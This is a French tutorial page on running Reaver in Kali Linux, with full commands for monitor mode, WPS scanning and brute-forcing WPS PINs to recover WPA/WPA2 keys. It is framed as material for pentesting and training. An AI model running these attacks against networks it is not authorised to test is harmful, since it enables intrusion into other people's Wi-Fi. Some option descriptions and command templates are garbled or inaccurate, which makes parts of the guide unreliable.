Reaver sur Kali Linux

Last Updated: 26 mai 2024By

Utilisation de Reaver sur Kali Linux – Guide Complet

Reaver est un outil puissant utilisé pour effectuer des attaques par force brute sur le Wi-Fi Protected Setup (WPS) afin de récupérer les clés WPA/WPA2 des réseaux sans fil. Utilisé par les professionnels de la cybersécurité, Reaver aide à identifier et exploiter les vulnérabilités dans les configurations WPS. Intégré à la distribution Kali Linux, Reaver est un outil essentiel pour renforcer la sécurité des réseaux Wi-Fi.

Installation de Reaver sur Kali Linux

Reaver est généralement pré-installé sur Kali Linux. Cependant, si nécessaire, vous pouvez l’installer en utilisant la commande suivante :

sudo apt-get update && sudo apt-get install reaver

Pour vérifier la version installée de Reaver, utilisez :

reaver --version

Lancement de Reaver

Pour utiliser Reaver, vous devez d’abord mettre votre interface sans fil en mode moniteur. Utilisez les commandes suivantes :

sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

Remplacez wlan0 par le nom de votre interface sans fil.

Options et Commandes de Reaver

Reaver offre une multitude d’options pour personnaliser vos tests de sécurité Wi-Fi. Voici les principales commandes et leurs utilisations :

1. Scan des Réseaux Wi-Fi

Utilisez wash pour scanner les réseaux Wi-Fi disponibles et identifier ceux avec WPS activé :

sudo wash -i wlan0

Notez le BSSID du réseau cible pour l’utiliser avec Reaver.

2. Lancer une Attaque avec Reaver

Pour lancer une attaque Reaver sur un réseau cible, utilisez la commande suivante :

sudo reaver -i wlan0 -b  -vv

Par exemple :

sudo reaver -i wlan0 -b 00:11:22:33:44:55 -vv

Cette commande lance une attaque Reaver sur le réseau avec le BSSID spécifié et affiche des informations détaillées (-vv).

3. Spécifier un PIN

Pour spécifier un PIN WPS connu, utilisez l’option -p :

sudo reaver -i wlan0 -b  -p  -vv

Par exemple :

sudo reaver -i wlan0 -b 00:11:22:33:44:55 -p 12345670 -vv

4. Ignorer les NACKs

Pour ignorer les NACKs (Negative Acknowledgments), utilisez l’option -N :

sudo reaver -i wlan0 -b  -N -vv

Par exemple :

sudo reaver -i wlan0 -b 00:11:22:33:44:55 -N -vv

5. Limiter les Tentatives

Pour limiter le nombre de tentatives, utilisez l’option -r :

sudo reaver -i wlan0 -b  -r :

Par exemple, pour 3 tentatives toutes les 60 secondes :

sudo reaver -i wlan0 -b 00:11:22:33:44:55 -r 3:60 -vv

6. Changer le Délai entre les Tentatives

Pour changer le délai entre les tentatives, utilisez l’option -d :

sudo reaver -i wlan0 -b  -d  -vv

Par exemple, pour un délai de 5 secondes :

sudo reaver -i wlan0 -b 00:11:22:33:44:55 -d 5 -vv

Exemple Pratique

Voici un exemple pratique d’utilisation de Reaver pour récupérer la clé WPA/WPA2 d’un réseau Wi-Fi :

    1. Installez et configurez Reaver :
sudo apt-get update && sudo apt-get install reaver
    1. Configurez l’interface sans fil en mode moniteur :
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
    1. Scannez les réseaux Wi-Fi avec WPS activé :
sudo wash -i wlan0
    1. Lancez une attaque Reaver sur le réseau cible :
sudo reaver -i wlan0 -b 00:11:22:33:44:55 -vv
  1. Attendez que Reaver récupère la clé WPA/WPA2.

Exploration Approfondie de Reaver

Reaver est un outil versatile avec de nombreuses options avancées pour des tests de sécurité Wi-Fi personnalisés. Voici quelques fonctionnalités supplémentaires :

1. Changer le Type de Mécanisme de Verrouillage

Pour changer le type de mécanisme de verrouillage, utilisez l’option --lock-delay :

sudo reaver -i wlan0 -b  --lock-delay= -vv

Par exemple, pour un délai de verrouillage de 60 secondes :

sudo reaver -i wlan0 -b 00:11:22:33:44:55 --lock-delay=60 -vv

2. Sauvegarde et Reprise de la Session

Pour sauvegarder la session et reprendre plus tard, utilisez les options -s et -K :

sudo reaver -i wlan0 -b  -s  -K 1 -vv

Par exemple :

sudo reaver -i wlan0 -b 00:11:22:33:44:55 -s session_file -K 1 -vv

3. Debugging

Pour activer le mode de débogage et obtenir plus d’informations, utilisez l’option -D :

sudo reaver -i wlan0 -b  -D -vv

Cas d’Usage de Reaver

Reaver est utilisé dans divers contextes pour améliorer la sécurité des réseaux Wi-Fi. Voici quelques cas d’usage spécifiques :

1. Évaluation de la Sécurité Wi-Fi

Les administrateurs réseau utilisent Reaver pour évaluer la sécurité de leurs réseaux Wi-Fi, identifier les vulnérabilités WPS et corriger les configurations faibles.

2. Tests de Pénétration

Les testeurs de pénétration utilisent Reaver pour simuler des attaques sur les réseaux Wi-Fi et tester la robustesse des configurations WPS.

3. Formation en Cybersécurité

Les formateurs en cybersécurité utilisent Reaver comme outil pédagogique pour enseigner les techniques d’attaque Wi-Fi et sensibiliser aux risques de sécurité associés à WPS.

Conclusion

Reaver est un outil indispensable pour les professionnels de la cybersécurité cherchant à analyser et améliorer la sécurité des réseaux Wi-Fi. En suivant ce guide, vous devriez être capable de commencer à utiliser Reaver efficacement sur Kali Linux. Que vous soyez administrateur réseau, testeur de pénétration ou formateur, Reaver offre une gamme d’outils et de fonctionnalités pour découvrir et corriger les vulnérabilités WPS des réseaux Wi-Fi.

Pour plus d’informations et des tutoriels avancés, consultez la documentation officielle de Reaver.

Ressources Supplémentaires

Voici quelques ressources supplémentaires pour approfondir vos connaissances et compétences avec Reaver :

Glossaire

Voici un glossaire des termes couramment utilisés dans Reaver et la cybersécurité :

  • WPS (Wi-Fi Protected Setup): Méthode simplifiée pour connecter des dispositifs à un réseau Wi-Fi sécurisé.
  • BSSID: Adresse MAC unique d’un point d’accès sans fil.
  • Forçage Brut: Technique consistant à essayer toutes les combinaisons possibles pour découvrir un mot de passe ou une clé de sécurité.
  • Agent Utilisateur: Chaîne qui identifie le type de navigateur et le système d’exploitation utilisé par le client.
  • Test de pénétration: Processus d’évaluation de la sécurité d’un système ou réseau en simulant des attaques réelles pour identifier les vulnérabilités.

editor's pick

latest video

news via inbox

Nulla turp dis cursus. Integer liberos  euismod pretium faucibua

Leave A Comment

you might also like